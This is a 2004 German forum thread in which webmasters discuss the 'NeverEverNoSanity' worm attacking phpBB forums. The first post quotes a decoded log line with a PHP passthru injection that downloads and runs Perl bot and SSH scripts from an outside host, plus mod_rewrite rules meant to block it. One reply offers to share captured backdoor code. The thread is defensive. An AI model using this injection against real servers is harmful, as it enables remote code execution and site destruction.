Web-Wurm NeverEverNoSanity löscht Webseiten

Beitrag von **Christophe** » 25.12.2004, 02:03

Es gibt eine neue 'Version' des Wurms, wenn man das ganze Decodiert sieht es so aus:

64.191.21.32 - - [25/Dec/2004:00:37:28 0100] "GET /forum/viewtopic.php?t=3958&rush=echo _START_; cd /tmp;wget civa.org/pdf/bot;perl bot;wget civa.org/pdf/ssh.a;perl ssh.a; echo _END_&highlight='.passthru($HTTP_GET_VARS[rush]).' HTTP/1.1" 200 103658 "-" "LWP::Simple/5.803"

Leider funktioniert ein mod_rewrite-Filter

RewriteCond %{QUERY_STRING} .*passthru.*
RewriteRule .* - [F,L]

nicht, weil das ganze Urlcodiert ist.

RewriteCond %{QUERY_STRING} .*%70%61%73%73%74%68%72%75.*
RewriteRule .* - [F,L]

funktioniert, aber ich finde das ganze nicht optimal. Jemand eine Idee? Kann man mod_rewrite die Url decodieren lassen?

von **Anzeige von ABAKUS** »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002

persönliche Betreuung
individuelle Beratung
kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Beitrag von **linux** » 29.12.2004, 00:06

hm ich hatte auch den wurm auf der seite, aber was noch sclimmer ist der versuchte eine backdoor/root kit zu installieren. ich konnte zwar keine offenen port festeleen, und löschen konnte er auch nix, denn ich hab eigene rechte vergeben. aber ich kann nur jedem empfehlen den server dann neu aufzusetzen. ich hab den code von der backdoor noch da wer ihn will, ach ja er war im /tmp/ ordner.

gruß

linux

Beitrag von **Ice Man** » 29.12.2004, 16:06

einfach den Browser via .htaccess aussperren, dann kann er nix anstellen.

Ist ja immer der gleiche.